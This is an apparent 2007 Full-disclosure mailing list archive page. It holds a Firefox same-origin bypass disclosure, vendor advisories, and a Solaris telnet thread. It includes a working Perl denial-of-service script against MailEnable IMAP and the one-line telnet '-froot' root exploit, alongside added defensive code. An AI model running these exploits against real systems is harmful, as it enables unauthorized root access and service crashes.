Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread James Matthews

Great, I cannot wait!

On 2/14/07, Daniel Veditz <[EMAIL PROTECTED]> wrote:


Peter Besenbruch wrote:
> Ben Bucksch wrote:
>> https://bugzilla.mozilla.org/show_bug.cgi?id=370445
>
> Are we going to see a version 2.0.0.2 of Firefox soon? With all the
> Firefox bugs, we are about due.

A 2.0.0.2 is in progress
http://weblogs.mozillazine.org/qa/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com

Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread Daniel Veditz
Peter Besenbruch wrote:
> Ben Bucksch wrote:
>> https://bugzilla.mozilla.org/show_bug.cgi?id=370445
> 
> Are we going to see a version 2.0.0.2 of Firefox soon? With all the 
> Firefox bugs, we are about due.

A 2.0.0.2 is in progress
http://weblogs.mozillazine.org/qa/



Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread Peter Besenbruch
Ben Bucksch wrote:
> https://bugzilla.mozilla.org/show_bug.cgi?id=370445


Hi Ben,

Are we going to see a version 2.0.0.2 of Firefox soon? With all the 
Firefox bugs, we are about due.


-- 
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky



Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread Ben Bucksch
https://bugzilla.mozilla.org/show_bug.cgi?id=370445



[Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-14 Thread Michal Zalewski
There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1,
but quite certainly affecting all recent versions.

The problem lies in how Firefox handles writes to the 'location.hostname'
DOM property. It is possible for a script to set it to values that would
not otherwise be accepted as a hostname when parsing a regular URL -
including a string containing \x00.

Doing this prompts a peculiar behavior: internally, DOM string variables
are not NUL-terminated, and as such, most checks will consider
'evil.com\x00foo.example.com' to be a part of the *.example.com domain. The
DNS resolver, however, and much of the remaining browser code, operates on
ASCIZ strings native to C/C++ instead, treating the aforementioned example
as 'evil.com'.

This makes it possible for evil.com to modify location.hostname as
described above, and have the resulting HTTP request still sent to
evil.com. Once the new page is loaded, the attacker will be able to set
cookies for *.example.com; he'll also be able to alter document.domain
accordingly, in order to bypass the same-origin policy for XMLHttpRequest
and cross-frame / cross-window data access.

A quick demonstration is available here:

  http://lcamtuf.dione.cc/ffhostname.html

If you want to confirm a successful exploitation, check Tools -> Options
-> Privacy -> Show Cookies... for coredump.cx after the test; for the demo
to succeed, the browser needs to have Javascript enabled, and must accept
session cookies.

The impact is quite severe: malicious sites can manipulate authentication
cookies for third-party webpages, and, by virtue of bypassing the
same-origin policy, can possibly tamper with the way these sites are
displayed or how they work.

Regards,
/mz
http://lcamtuf.coredump.cx/

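Added illustration, not part of Zalewski's post: the two views of the same bytes that the post describes (a length-counted DOM-style domain check versus a NUL-terminated ASCIZ consumer), followed by a validator that rejects the embedded NUL before any domain comparison is made. The sample string, the function names and the 253-byte length limit are this example's own constructions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: the hostname from the post with an embedded NUL.
 * "\0" is used rather than "\x00" so the hex escape does not swallow the
 * following 'f'. sizeof counts the trailing terminator, hence the -1. */
static const char SAMPLE[] = "evil.com\0foo.example.com";
#define SAMPLE_LEN (sizeof(SAMPLE) - 1)   /* 24 bytes, NUL at offset 8 */

/* Length-counted suffix check, the way a DOM-string-based domain check
 * behaves: it compares all `len` bytes and never stops at a NUL. */
bool dom_is_in_domain(const char *host, size_t len, const char *domain)
{
    size_t dlen = strlen(domain);
    if (len < dlen) return false;
    /* Either equal to the domain, or ends with ".domain". */
    if (memcmp(host + len - dlen, domain, dlen) != 0) return false;
    return len == dlen || host[len - dlen - 1] == '.';
}

/* What a NUL-terminated (ASCIZ) consumer such as the resolver actually
 * sees: the string ends at the first NUL. Copies that view into `out`
 * and returns the number of bytes it saw. */
size_t asciz_view(const char *host, char *out, size_t outsz)
{
    size_t n = strlen(host);              /* stops at the embedded NUL */
    if (n >= outsz) n = outsz - 1;
    memcpy(out, host, n);
    out[n] = '\0';
    return n;
}

/* Hardened check: validate the length-counted string byte by byte and
 * reject anything that cannot appear in a hostname (NUL included) before
 * any domain comparison is done. The 253-byte cap is an assumption here. */
bool hostname_is_valid(const char *host, size_t len)
{
    if (len == 0 || len > 253) return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '-' || c == '.';
        if (!ok) return false;            /* rejects "\0" and other junk */
    }
    return host[0] != '.' && host[len - 1] != '.';
}

/* Domain check that only answers after the hostname has been validated. */
bool safe_is_in_domain(const char *host, size_t len, const char *domain)
{
    return hostname_is_valid(host, len) && dom_is_in_domain(host, len, domain);
}

int main(void)
{
    char seen[64];
    printf("DOM-style check says in example.com: %d\n",
           dom_is_in_domain(SAMPLE, SAMPLE_LEN, "example.com"));
    asciz_view(SAMPLE, seen, sizeof seen);
    printf("ASCIZ consumer sees: %s\n", seen);
    printf("Hardened check says in example.com: %d\n",
           safe_is_in_domain(SAMPLE, SAMPLE_LEN, "example.com"));
    return 0;
}
```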


[Full-disclosure] [SECURITY] [DSA 1260-1] New imagemagick package fix arbitrary code execution

2007-02-14 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

--------------------------------------------------------------------------
Debian Security Advisory DSA 1260-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                        Moritz Muehlenhoff
February 14th, 2007                     http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: imagemagick
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID : CVE-2007-0770

Vladimir Nadvornik discovered that the fix for a vulnerability in the
PALM decoder of Imagemagick, a collection of image manipulation programs,
was ineffective. To avoid confusion a new CVE ID has been assigned;
the original issue was tracked as CVE-2006-5456.

For the stable distribution (sarge) this problem has been fixed in
version 6:6.0.6.2-2.9.

For the upcoming stable distribution (etch) this problem has been
fixed in version 7:6.2.4.5.dfsg1-0.14.

For the unstable distribution (sid) this problem has been fixed in
version 7:6.2.4.5.dfsg1-0.14.

We recommend that you upgrade your imagemagick packages.


Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------


[Full-disclosure] [SECURITY] [DSA 1259-1] New fetchmail packages fix information disclosure

2007-02-14 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

--------------------------------------------------------------------------
Debian Security Advisory DSA 1259-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                        Moritz Muehlenhoff
February 14th, 2007                     http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: fetchmail
Vulnerability  : programming error
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-5867

Isaac Wilcox discovered that fetchmail, a popular mail retrieval and
forwarding utility, insufficiently enforces encryption of connections,
which might lead to information disclosure.

For the stable distribution (sarge) this problem has been fixed in
version 6.2.5-12sarge5.

For the upcoming stable distribution (etch) this problem has been
fixed in version 6.3.6~rc5-1.

For the unstable distribution (sid) this problem has been fixed in
version 6.3.6~rc5-1.

We recommend that you upgrade your fetchmail package.


Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------


  These files will probably be moved into the stable distribution on
  its next update.


Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread Rodrigo Barbosa
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, Feb 12, 2007 at 12:00:30AM -0600, Gadi Evron wrote:
> Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
> the DSHIELD list:
> 
> 
> If you run Solaris, please check if you got telnet enabled NOW. If you
> can, block port 23 at your perimeter. There is a fairly trivial
> Solaris telnet 0-day.
> 
> telnet -l "-froot" [hostname]
> 
> will give you root on many Solaris systems with default installs
> We are still testing. Please use our contact form at
> https://isc.sans.org/contact.html
> if you have any details about the use of this exploit.
> 

-l -froot ? Wow. We used to have a bad bug on AIX, back in 1995 or so.
It was long fixed. If I recall correctly, it was also present on SunOS,
or maybe Solaris 1 or 2, but I'm not sure of anything but AIX.

[]s

-- 
Rodrigo Barbosa
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)




[Full-disclosure] [ALERT] CLICK HERE TO PARTY [ALERT]

2007-02-14 Thread Christopher Abad
full disclosure, beware, im going to take this opportunity to spam you,
not far from the normal posting standard of this list, so here goes.
im opening an art gallery downtown san francisco and the first opening
reception is this weekend.  if you are in the bay area it would be cool
if you came by and checked it out.

20 GOTO 10 presents "HELLO WORLD," our very first tiny little opening
reception and grand opening with works from alexis mackenzie, mindy datema,
aempirei and asm.

saturday, february 17, 2007 7-11PM

20 GOTO 10
679 geary st.
san francisco ca 94102

http://www.twentygoto10.com



Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread v3dt3n

From: "Ham Beast" <[EMAIL PROTECTED]>

seriously why the fuck is 10 email on the telnet of the solaris with
worthless content by gadi enron in mine inbox?



I could be wrong, but I strongly suspect the reason to be someone exploiting
the grok.org.uk with the 'full-disclosure' ID and mass-mailing every mail
sent to that address to those who are present in the "fd-request" ID's
addressbook. My mailbox too has been bombarded with all kinds of hacker
stuff, including the antics of this real funny n3tty dude. Let me know if
you want to see them, I could forward 'em to you.

Regards
v3dt3n

Re: [Full-disclosure] Sample Packet Captures

2007-02-14 Thread H D Moore
It might be more effective to contribute to the Wireshark Wiki:
 - http://wiki.wireshark.org/SampleCaptures

-HD

On Wednesday 14 February 2007 11:17, crazy frog crazy frog wrote:
> As it is not possible for everyone to setup different networks
> quickly, I am thinking to start a wiki which will contain various
> packet captures. It will help people in quickly getting the required
> dump for analysis/reference purposes. I have started a wiki here:
> http://secgeeks.com/packetland
> I would like to hear your feedback regarding this. Feel free to upload
> any packet dump you might have.



[Full-disclosure] Sample Packet Captures

2007-02-14 Thread crazy frog crazy frog
Hi All,

As it is not possible for everyone to setup different networks
quickly, I am thinking to start a wiki which will contain various
packet captures. It will help people in quickly getting the required
dump for analysis/reference purposes. I have started a wiki here:
http://secgeeks.com/packetland
I would like to hear your feedback regarding this. Feel free to upload
any packet dump you might have.

Regards,
_CF
---
http://www.secgeeks.com
get a blog on secgeeks :)
register here:-
http://secgeeks.com/user/register
rss feeds :-
http://secgeeks.com/node/feed
Submit you security articles,send them to [EMAIL PROTECTED]

http://www.newskicks.com
Submit and kick for new stories from all around the world.
---



[Full-disclosure] MailEnable DoS POC-2

2007-02-14 Thread mu-b
This version will work on the latest MailEnable v2.37..

Symantec seem to think this is the same issue as BID 20290, but it is
in fact, completely different... and somewhat unpatched..
---
([EMAIL PROTECTED])

#!/usr/bin/perl
#
# maildisable-v7.pl
#
# Mail Enable Professional/Enterprise v2.32-7 (win32)
# by mu-b - Wed Feb 14 2007
#
# - Tested on: Mail Enable Professional v2.37 (win32)
#

use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");
    send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
    sleep($send_delay);

    $buf = ($PAD x 12).
           "\xfa\xff\xff\xff".
           ($PAD x 12);
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    $buf = ($PAD x 28).
           "\x00\x01".
           ($PAD x 2).
           "\xff\xff\xff\x7f";
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    print("-> * Successfully sent payload!\n");
}

sub print_header {
    print("MailEnable Pro v2.37 DoS POC\n");
    print("by: <[EMAIL PROTECTED]>\n\n");
}

sub usage {
    print(qq(Usage: $0 -t 

 -t : hostname to test
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target) || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto  = getprotobyname('tcp')  || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)  || die("Error: $!\n");
    return(1338);
}

[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Firewall Services Module

2007-02-14 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: 
Multiple Vulnerabilities in Firewall Services Module

Advisory ID: cisco-sa-20070214-fwsm

http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml

Revision 1.0

For Public Release 2007 February 14 1600 UTC (GMT)

- ---

Summary
===

Multiple vulnerabilities exist in the Cisco Firewall Services Module
(FWSM). These vulnerabilities occur in the processing of specific
Hypertext Transfer Protocol (HTTP), Secure HTTP (HTTPS), Session
Initiation Protocol (SIP), and Simple Network Management Protocol
(SNMP) traffic. If verbose logging is enabled for debugging purposes, a
vulnerability exists when the FWSM processes packets destined to
itself. All of these vulnerabilities may result in a reload of the
device.

An additional vulnerability is included in this advisory in which the
manipulation of access control lists (ACLs) that make use of object
groups may corrupt the ACL and create a situation where unwanted
traffic may be permitted or desirable traffic may be blocked.

These vulnerabilities are independent of each other; a release that is
affected by one vulnerability is not necessarily affected by the
others.

There are workarounds for some of the vulnerabilities disclosed in this
advisory.

Cisco has made free software available to address this issue for
affected customers.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml

Affected Products
=

The vulnerabilities described in this document
apply to the FWSM. The companion advisory
http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml
contains information about similar vulnerabilities that affect the
Cisco PIX 500 Series Security Appliances and the Cisco ASA 5500 Series
Adaptive Security Appliances.

Vulnerable Products
+--

The following table indicates which software releases for the Cisco
FWSM are affected and under what conditions:

+-+
| Vulnerability | Only affected  | Vulnerable | Versions | Cisco Bug  |
| Name  | if...  | by | affected | ID |
|   ||  default?  |  ||
|---+++--+|
|   | Enhanced   ||  ||
| 1. Enhanced   | inspection of  || All 3.x  ||
| Inspection of | HTTP traffic   || software ||
| Malformed | is enabled | No | releases | CSCsd75794 |
| HTTP Traffic  | through the|| prior to ||
| May Cause | command|| 3.1  ||
| Reload| "inspect http  || (3.24)   ||
|   | "   ||  ||
|---+++--+|
|   | SIP inspection ||  ||
|   | is enabled || All  ||
|   | through the|| software ||
|   | command "fixup || releases ||
| 2. Inspection | protocol sip"  || prior to ||
| of Malformed  | (in FWSM   | Yes for| 2.3  ||
| SIP Messages  | software 2.x   | 2.x and no | (4.12)   | CSCsg80915 |
| May Cause | and before) or | for 3.x| and all  ||
| Reload| through the|| 3.x  ||
|   | command|| releases ||
|   | "inspect sip"  || prior to ||
|   | (in FWSM   || 3.1  ||
|   | software 3.x   || (3.24)   ||
|   | and later) ||  ||
|---+++--+|
|   | Logging at ||  ||
|   | "debugging"||  ||
| 3. Processing | level  || All 3.x  ||
| of Packets| (regardless of || software ||
| Destined to   | the logging| No | releases | CSCse85707 |
| the FWSM May  | destination)   || prior to ||
| Cause Reload  | and syslog || 3.1(3.3) ||
|   | message 710006 ||  ||
|   | is enabled ||  ||
|---+++--+|
|   | Network access ||  |  

[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and ASA Appliances

2007-02-14 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: 
Multiple Vulnerabilities in Cisco PIX and ASA Appliances

Advisory ID: cisco-sa-20070214-pix

http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml

Revision 1.0

For Public Release 2007 February 14 1600 UTC (GMT)

- ---

Summary
===

Multiple vulnerabilities are found in Cisco PIX 500 Series Security
Appliances and the Cisco ASA 5500 Series Adaptive Security Appliances.
They affect the following:

  * Enhanced inspection of Malformed Hypertext Transfer Protocol (HTTP)
traffic
  * Inspection of malformed Session Initiation Protocol (SIP) packets
  * Inspection of a stream of malformed Transmission Control Protocol
(TCP) packets
  * Privilege escalation

Vulnerabilities are independent of each other. If a vulnerability
affects a device, it does not necessarily mean that the device is
affected by all of them.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20070214-pix.shtml.

Affected Products
=

In addition to the Cisco PIX 500 Series Security Appliances and the
Cisco ASA 5500 Series Adaptive Security Appliances, some
vulnerabilities also affect Cisco Firewall Services Module (FWSM). More
information regarding FWSM can be found in the companion advisory 
http://www.cisco.com/warp/public/707/cisco-sa-20070214-fwsm.shtml.

Vulnerable Products
+--

The following software releases for Cisco PIX and ASA Security
Appliances are affected:

+-+
| Vulnerability | Only affected  | Vulnerable | Versions | Cisco Bug  |
| Name  | if...  | by | affected | ID |
|   ||  default?  |  ||
|---+++--+|
|   | Enhanced   || Only 7.x ||
|   | inspection of  || software ||
| Enhanced  | HTTP traffic   || releases ||
| inspection of | is enabled via | No | prior to | CSCsd75794 |
| Malformed | the command|| 7.0  ||
| HTTP traffic  | "inspect http  || (4.14)   ||
|   | "   || and 7.1  ||
|   ||| (2.1)||
|---+++--+|
|   ||| For 6.x  ||
|   ||| software ||
|   ||| all  ||
|   ||| releases ||
|   ||| prior to ||
|   ||| 6.3  ||
|   ||| (5.115), ||
|   ||| for  ||
|   | SIP inspection | No for 7.x | 7.0.x||
| Inspection of | is enabled via | releases   | software | CSCse27708 |
| malformed SIP | the command| Yes for| all  | and|
| packets   | "fixup | 6.x| releases | CSCsd97077 |
|   | protocol sip"  | releases   | prior to ||
|   | or || 7.0  ||
|   | "inspect sip"  || (5.2),   ||
|   ||| and for  ||
|   ||| 7.1.x||
|   ||| software ||
|   ||| all  ||
|   ||| releases ||
|   ||| prior to ||
|   ||| 7.1(2.5) ||
|---+++--+|
|   | TCP-based  ||  ||
| Inspection of | protocol   || Only ||
| a stream of   | inspection is  || 7.2.2||
| malformed TCP | enabled, for   | Yes| software | CSCsh12711 |
| packets   | example|| release  ||
|   | "inspect ftp"  ||  ||
|   | or ||  ||
|   | "inspect http" ||  ||
|---+++--+|
|   | If LOCAL   || Only | 

[Full-disclosure] (no subject)

2007-02-14 Thread j0F

Re: [Full-disclosure] Solaris telnet vulnberability - how many onyour network?

2007-02-14 Thread David Taylor
A patch has been released.

http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1


==
David Taylor //Sr. Information Security Specialist
University of Pennsylvania Information Security 
Philadelphia PA USA
(215) 898-1236
http://www.upenn.edu/computing/security/
== 


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Joe Shamblin
Sent: Tuesday, February 13, 2007 7:17 PM
To: [EMAIL PROTECTED]
Cc: Oliver Friedrichs; bugtraq@securityfocus.com;
full-disclosure@lists.grok.org.uk; Gadi Evron
Subject: Re: [Full-disclosure] Solaris telnet vulnberability - how many
onyour network?


[EMAIL PROTECTED] wrote:
>> On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
 On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
>> Am I missing something?  This vulnerability is close to 10 years old.
>> It was in one of the first versions of Solaris after Sun moved off of
>> the SunOS BSD platform and over to SysV.  It has specifically to do with
>> how arguments are processed via getopt() if I recall correctly.
> You're confused with AIX/Linux
>
> Solaris did not have the -f option in login until much later.
 Hi Casper. While we have you here, any idea on when Sun will be
patching
 this issue?
>>> Now, follow the links from http://sunsolve.sun.com/tpatches
>>>
>>> Casper
>>>
>> Many thanks Casper! Can you give some more information on exactly what is
>> patched. Any Sun released advisory?
> 
> 
> The simplest possible fix on such short notice:
> 
> http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923
> 
> Casper


How about just uncommenting the following from /etc/default/login

# If CONSOLE is set, root can only login on that device.
# Comment this line out to allow remote login by root.
#
CONSOLE=/dev/console

Not a fix to be sure, but at least prevents a remote login.

Joe
-- 
Joe Shamblin[EMAIL PROTECTED]
Senior Systems Administrator Department of Computer Science
(919) 660-6582  Duke University





[Full-disclosure] Secunia Research: MailEnable Web Mail Client Multiple Vulnerabilities

2007-02-14 Thread Secunia Research
== 

 Secunia Research 14/02/2007

   - MailEnable Web Mail Client Multiple Vulnerabilities -

== 
Table of Contents

Affected Software..............................................1
Severity.......................................................2
Vendor's Description of Software...............................3
Description of Vulnerability...................................4
Solution.......................................................5
Time Table.....................................................6
Credits........................................................7
References.....................................................8
About Secunia..................................................9
Verification..................................................10

== 
1) Affected Software 

* MailEnable Professional Edition 2.351

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately Critical
Impact: Cross-site scripting
Where:  From Remote

== 
3) Vendor's Description of Software

"MailEnable's mail server software provides a powerful, scalable hosted
messaging platform for Microsoft Windows. MailEnable offers stability,
unsurpassed flexibility and an extensive feature set which allows you
to provide cost-effective mail services."

Product Link:
http://www.mailenable.com/default.asp

== 
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in MailEnable Web
Mail Client, which can be exploited by malicious people to conduct
cross-site scripting, cross-site request forgery, and script insertion
attacks.

1) Scripts in email messages are not properly sanitised before being
displayed in the email message. This can be exploited to insert
arbitrary HTML and script code, which is executed in a user's browser
session in context of an affected site when a user views a specially
crafted email message.

2) Input passed to the "ID" parameter in
mewebmail/base/default/lang/EN/right.asp,
mewebmail/base/default/lang/EN/Forms/MAI/list.asp, and
mewebmail/base/default/lang/EN/Forms/VCF/list.asp is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.

Successful exploitation requires that the target user is logged in.

3) The application allows users to send messages via HTTP requests
without performing any validity checks to verify the request. This can
be exploited to change a user's settings by e.g. tricking a target user
into visiting a malicious website.

== 
5) Solution 

Update to the latest version.
http://www.mailenable.com/download.asp

== 
6) Time Table 

06/02/2007 - Vendor notified.
06/02/2007 - Vendor response.
13/02/2007 - Request for status update.
13/02/2007 - Vendor response with fix information.
14/02/2007 - Public disclosure.

== 
7) Credits 

Discovered by JJ Reyes, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following CVE identifiers:
* CVE-2007-0651 (XSS)
* CVE-2007-0652 (CSRF)

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

== 
10) Verification 

Please verify this advisory by visiting
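
The first issue above, script in a message body reaching the browser, is the one a webmail client has to solve at render time. As an added example (not Secunia's or MailEnable's code), here is an allowlist-based HTML filter in Python; the tag and attribute allowlist is a sample assumption for this example, and the message body is constructed.

```python
from html import escape
from html.parser import HTMLParser

# Sample allowlist (an assumption for this example): tags and attributes a webmail
# client can re-emit safely; anything not listed here never reaches the browser.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li", "div", "span"}
ALLOWED_ATTRS = {"a": {"href"}, "div": {"class"}, "span": {"class"}}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}

class MailBodySanitizer(HTMLParser):
    """Rebuilds a message body from the allowlist; script/style bodies and every
    unlisted tag or attribute (onerror=, javascript: URLs, ...) are discarded."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0          # > 0 while inside <script>/<style>, whose text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:            # HTMLParser lower-cases tag and attribute names
            if value is None or name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_SCHEMES):
                continue                      # allowlist on scheme: javascript:/data:/vbscript: are out
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))   # re-encode text so entities cannot smuggle markup

def sanitize_mail_body(html_body):
    """Return the message body as HTML that contains only allowlisted markup."""
    parser = MailBodySanitizer()
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out)

if __name__ == "__main__":
    # Constructed sample message body, not a real mail
    print(sanitize_mail_body('<p onclick="x()">hi <script>alert(1)</script><b>there</b></p>'))
```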

Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread Casper . Dik

>> The simplest possible fix on such short notice:
>> 
>> http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923
>> 
>> Casper
>
>
>How about just uncommenting the following from /etc/default/login
>
># If CONSOLE is set, root can only login on that device.
># Comment this line out to allow remote login by root.
>#
>CONSOLE=/dev/console
>
>Not a fix to be sure, but at least prevents a remote login.

That is the default; and preventing root logins does not prevent
other logins.

"svcadm disable telnet" is the best fix (and there's really no
reason to enable it)

Casper

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread Adrian Sanabria

If someone was going to plant a backdoor in Solaris, don't you think they
would have chosen a service that most people would leave turned on? The only
way I can see someone choosing telnet for a backdoor is if it happened a
long time ago. So, two things I'm curious about, but too busy (lazy) at
the moment to look up:

1. Didn't Sun open up the source to Solaris? I wonder if it looks more like
a bug or a backdoor in the source.
2. Did this get reintroduced to Solaris, or has it been there ever since the
legacy code was pulled over from SysV?

--Adrian

P.S. - Apologies if this was answered somewhere, and I missed it.


On 2/13/07, Gadi Evron <[EMAIL PROTECTED]> wrote:


On Mon, 12 Feb 2007, Oliver Friedrichs wrote:
>
> Am I missing something?  This vulnerability is close to 10 years old.
> It was in one of the first versions of Solaris after Sun moved off of
> the SunOS BSD platform and over to SysV.  It has specifically to do with
> how arguments are processed via getopt() if I recall correctly.

Hey Oliver! :)

Well then, I guess it just became new again. And to be honest, I have to
agree with a previous poster and suspect (only suspect) it could somehow
be a backdoor rather than a bug.

The reason why this vulnerability is so critical is the number of networks
and organizations which rely on Solaris for critical production servers,
as well as use telnet for internal communication on their LAN (now how
smart is that? I'd rather use telnet on the Internet than on a local LAN).

Further, there are quite a few third party appliances (some
infrastructure back-end) that can not easily be patched running on
Solaris (forget fuzzing or VA, people never even NMAP appliances they
buy).

I am unsure of how long we will see this in to-do items of corporate
security teams around the world, but I am sure Sun's /8 is getting a lot
of action recently.

>
> Oliver

Gadi.

>
> -Original Message-
> From: Gadi Evron [mailto:[EMAIL PROTECTED]
> Sent: Sunday, February 11, 2007 10:01 PM
> To: bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Solaris telnet vulnberability - how many on your network?
>
> Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
> the DSHIELD list:
>
> 
> If you run Solaris, please check if you got telnet enabled NOW. If
> you
> can, block port 23 at your perimeter. There is a fairly trivial
> Solaris telnet 0-day.
>
> telnet -l "-froot" [hostname]
>
> will give you root on many Solaris systems with default installs
> We are still testing. Please use our contact form at
> https://isc.sans.org/contact.html
> if you have any details about the use of this exploit.
> 
>
> You mean they still use telnet?!
>
> Update from HD Moore:
> "but this bug isnt -froot, its -fanythingbutroot =P"
>
> On the exploits@ mailing list and on DSHIELD this vulnerability was
> verified as real.
>
> If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a
> strong suggestion.
>
> Anyone else running Solaris?
>
>   Gadi.
>
>



[Full-disclosure] Solaris telnet vuln solutions digest and network risks

2007-02-14 Thread Gadi Evron
A couple of updates and a summary digest of useful information shared from
all around on this vulnerability, for those of us trying to make sense of
what it means to our networks:

1. Sun released a patch (although it is not a final one). It can be found
on their site ( http://sunsolve.sun.com/tpatches - thanks to Casper Dik of
Sun, for those who have been following the discussion).

To quote: "the simplest possible fix on such short notice":
